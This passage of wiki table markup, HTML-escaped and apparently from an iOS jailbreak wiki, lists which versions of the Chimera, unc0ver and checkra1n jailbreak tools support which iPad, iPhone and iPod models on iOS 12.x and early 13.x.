! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;15&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPad Air]]&lt;br /&gt;
! [[iPad Air 2]]&lt;br /&gt;
! [[iPad Pro (12.9-inch)]]&lt;br /&gt;
! [[iPad Pro (9.7-inch)]]&lt;br /&gt;
! [[iPad (5th generation)]]&lt;br /&gt;
! [[iPad Pro (12.9-inch) (2nd generation)]]&lt;br /&gt;
! [[iPad Pro (10.5-inch)]]&lt;br /&gt;
! [[iPad (6th generation)]]&lt;br /&gt;
! [[iPad Pro (11-inch)]]&lt;br /&gt;
! [[iPad Pro (12.9-inch) (3rd generation)]]&lt;br /&gt;
! [[iPad Air (3rd generation)]]&lt;br /&gt;
! [[iPad mini 2]]&lt;br /&gt;
! [[iPad mini 3]]&lt;br /&gt;
! [[iPad mini 4]]&lt;br /&gt;
! [[iPad mini (5th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.0&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;12&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.0.1&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.1&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;8&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.1.1&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.1.3&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.1.4&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.2&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| {{partial}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.3.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 12.4&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| {{partial}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.4&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.5&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.6&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.7&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.8&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;&amp;lt;/ref&amp;gt;&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;10&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;references&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;Check the &amp;quot;Allow untested iOS/iPadOS/tvOS versions&amp;quot; checkbox in the options view to bypass the version check.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;16&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPhone 5s]]&lt;br /&gt;
! [[N61AP|iPhone 6]]&lt;br /&gt;
! [[N56AP|iPhone 6 Plus]]&lt;br /&gt;
! [[iPhone 6s]]&lt;br /&gt;
! [[iPhone 6s Plus]]&lt;br /&gt;
! [[iPhone SE (1st generation)]]&lt;br /&gt;
! [[iPhone 7]]&lt;br /&gt;
! [[iPhone 7 Plus]]&lt;br /&gt;
! [[iPhone 8]]&lt;br /&gt;
! [[iPhone 8 Plus]]&lt;br /&gt;
! [[iPhone X]]&lt;br /&gt;
! [[iPhone XR]]&lt;br /&gt;
! [[iPhone XS]]&lt;br /&gt;
! [[iPhone XS Max]]&lt;br /&gt;
! [[N102AP|iPod touch (6th generation)]]&lt;br /&gt;
! [[N112AP|iPod touch (7th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.0&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;16&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.0.1&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.1&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.1.1&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.1.2&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;14&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.1.3&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.1.4&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.2&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;15&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.3.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.3.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;9&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 12.4&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Chimera]]&lt;br /&gt;
| 1.4.0&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{partial}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;16&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 12.4.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;12&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.2&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;6&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;8&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.3&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.4&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.5&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.6&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.7&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| 12.4.8&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;&amp;lt;/ref&amp;gt;&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;11&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;references&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;untestedOS&amp;quot;&amp;gt;Check the &amp;quot;Allow untested iOS/iPadOS/tvOS versions&amp;quot; checkbox in the options view to bypass the version check.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====13.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iPadOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;15&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[iPad (5th generation)]]&lt;br /&gt;
! [[iPad (6th generation)]]&lt;br /&gt;
! [[iPad (7th generation)]]&lt;br /&gt;
! [[iPad mini 4]]&lt;br /&gt;
! [[iPad mini (5th generation)]]&lt;br /&gt;
! [[iPad Air 2]]&lt;br /&gt;
! [[iPad Air (3rd generation)]]&lt;br /&gt;
! [[iPad Pro (12.9-inch)]]&lt;br /&gt;
! [[iPad Pro (9.7-inch)]]&lt;br /&gt;
! [[iPad Pro (12.9-inch) (2nd generation)]]&lt;br /&gt;
! [[iPad Pro (10.5-inch)]]&lt;br /&gt;
! [[iPad Pro (11-inch)]]&lt;br /&gt;
! [[iPad Pro (12.9-inch) (3rd generation)]]&lt;br /&gt;
! [[iPad Pro (11-inch) (2nd generation)]]&lt;br /&gt;
! [[iPad Pro (12.9-inch) (4th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{yes|Yes &amp;lt;br/&amp;gt;&amp;lt;small&amp;gt;(Semi-Tethered)&amp;lt;/small&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;18&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[unc0ver]]&lt;br /&gt;
| 5.2.0&lt;br /&gt;
| colspan=&amp;quot;13&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 13.1.1&lt;br /&gt;
| [[checkra1n]]&lt;br /&gt;
| 0.10.2 beta&lt;br /&gt;
